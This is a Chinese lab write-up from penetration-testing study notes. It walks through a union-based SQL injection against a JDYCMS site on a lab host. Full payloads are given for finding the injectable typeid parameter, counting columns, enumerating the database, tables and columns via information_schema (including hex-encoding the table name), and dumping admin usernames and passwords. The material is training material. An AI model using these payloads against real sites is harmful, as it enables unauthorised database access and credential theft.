Java教程

NSATP-A学习笔记之Day3-3SQL联合查询

本文主要是介绍NSATP-A学习笔记之Day3-3SQL联合查询,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

文章目录

    • 简单的sql注入漏洞
      • 实验目的
      • 实验环境
      • 实验工具
      • 实验内容
      • 免责声明

简单的sql注入漏洞

实验目的

  • 练习sql注入

  • 实验环境

    wamp

    • IP:172.16.12.2

实验工具

  • 火狐浏览器:是一款非常流行的internet浏览器
  • 蚁剑:是一款专业的网站管理软件,本次试验主要用到其动态脚本管理功能
  • hackbar:Hackbar是一个Firefox的插件,是一种简单的安全审计/渗透测试工具。此工具栏将帮助您测试SQL注入
information_schema
			|
			+--	tables
			|		|
			|		`-- table_name
			|		|
			|		`-- table_schema
			|		
			`-- columns	
					|
					`--	column_name
					|
					`--	table_name
					|
					`-- table_schema

实验内容

1、访问172.16.12.2

在这里插入图片描述

2、点开一个页面(如公司介绍),发现通过typeid.php页面传递typeid参数来访问页面,这里可能是个注入点
在这里插入图片描述
在这里插入图片描述

3、测试寻找注入点

   Payload:http://172.16.12.2/typeid.php?typeid=1'%23
   发现

在这里插入图片描述

4、Order by判断列数,判断出有5列

   Payload:http://172.16.12.2/typeid.php?typeid=1 order by 5%23

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5、使用联合注入判断回显位,回显位为2

   Payload:
   http://172.16.12.2/typeid.php?typeid=-1 union select 1,2,3,4,5%23

在这里插入图片描述

6、查看当前数据库名

   Payload:
   http://172.16.12.2/typeid.php?typeid=-1 union select 1,database(),3,4,5%23

在这里插入图片描述

7、查看数据库下的表

   Payload:
   http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(table_name)from information_schema.columns where table_schema=database()),3,4,5%23

在这里插入图片描述

8、查看jdy_admin表里的列

  Payload:
  http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(column_name)from  information_schema.columns where table_schema=database()and  table_name=jdy_admin),3,4,5%23

在这里插入图片描述

发现没回显内容,我们尝试将表名进行16进制编码(0x6a64795f61646d696e)后再进行尝试

 Payload:
   http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(column_name)from  information_schema.columns where table_schema=database()and  table_name=0x6a64795f61646d696e),3,4,5%23

在这里插入图片描述
在这里插入图片描述

9、查看列中的数据username,password

  Payload:
http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(username,password)from jdycms.jdy_admin),3,4,5%23

在这里插入图片描述

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

这篇关于NSATP-A学习笔记之Day3-3SQL联合查询的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!